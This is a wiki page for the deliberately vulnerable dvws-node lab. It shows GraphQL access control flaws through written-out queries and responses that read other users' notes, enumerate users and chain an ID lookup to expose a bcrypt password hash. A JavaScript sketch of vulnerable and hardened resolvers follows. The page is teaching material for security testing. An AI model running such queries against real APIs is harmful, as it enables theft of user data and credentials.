GraphQL Access Control Issues
Sam Sanoop edited this page Dec 15, 2021
Access control issues can exist in GraphQL APIs; the queries below show several in dvws-node.
- The `readNote` query can be used to read any note from the endpoint:

  ```graphql
  query {
    readNote(name:"test"){
      id,
      name,
      body,
      created_date,
      user,
      type,
      no
    }
  }
  ```
- The `updateUserUploadFile` mutation can be called by any authenticated user - https://github.com/snoopysecurity/dvws-node/wiki/GraphQL-
- The `userSearchByUsername` query can be used to access information about any user.

  Request:

  ```graphql
  query {
    userSearchByUsername(username: "test")
    {
      id,
      username,
      password,
      admin
    }
  }
  ```

  Response:

  ```json
  {
    "data": {
      "userSearchByUsername": [
        {
          "id": "61ba33fda2b09f19c069363e",
          "username": "test",
          "password": null,
          "admin": false
        }
      ]
    }
  }
  ```
  This query by default does not return the password hash. However, the `id` it returns can be passed to `userFindbyId`, which does return the hash.

  Request:

  ```graphql
  query {
    userFindbyId(id: "61ba33fda2b09f19c069363e")
    {
      username,
      password,
      admin
    }
  }
  ```

  Response:

  ```json
  {
    "data": {
      "userFindbyId": {
        "username": "test",
        "password": "$2b$10$ZdP85I0w91KePs9FoGVr1O9wq1SthzQNSYXGjufAPw6aGN/qvaHuS",
        "admin": false
      }
    }
  }
  ```
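As an added illustration (not dvws-node's own code), the resolver pattern behind `readNote` and `userFindbyId` is shown below once without and once with an authorization check; the in-memory store, user records and the `context` object are constructed assumptions.

```javascript
// Added illustration, not dvws-node's code. Store, users and context are
// constructed sample data; the "$2b$10$PLACEHOLDER" strings stand in for hashes.
const notes = [
  { id: 1, name: "test", body: "hello", user: "test", type: "note" },
  { id: 2, name: "secret", body: "payroll", user: "alice", type: "note" },
];
const users = {
  test: { id: "u1", username: "test", password: "$2b$10$PLACEHOLDER", admin: false },
  alice: { id: "u2", username: "alice", password: "$2b$10$PLACEHOLDER", admin: false },
};

// Vulnerable pattern: the resolver trusts only the client-supplied argument
// and never consults who is calling, so any authenticated user reads any note.
function readNoteUnsafe(args) {
  return notes.filter((n) => n.name === args.name);
}

// Hardened pattern: the caller's identity comes from the request context
// (populated by the auth layer, never from query arguments), and the lookup
// is scoped to records that caller owns.
function readNoteSafe(args, context) {
  if (!context || !context.user) throw new Error("unauthenticated");
  return notes.filter(
    (n) => n.name === args.name && n.user === context.user.username
  );
}

// Field-level control for userFindbyId: the password hash is stripped unless
// the caller is looking up their own record or is an admin.
function userFindByIdSafe(args, context) {
  if (!context || !context.user) throw new Error("unauthenticated");
  const target = Object.values(users).find((u) => u.id === args.id);
  if (!target) return null;
  const isSelf = target.username === context.user.username;
  const isAdmin = context.user.admin === true;
  if (isSelf || isAdmin) return { ...target };
  const { password, ...publicFields } = target; // drop the sensitive field
  return publicFields;
}
```

The same ownership and role checks belong in every resolver that touches user-owned data, including mutations such as `updateUserUploadFile`.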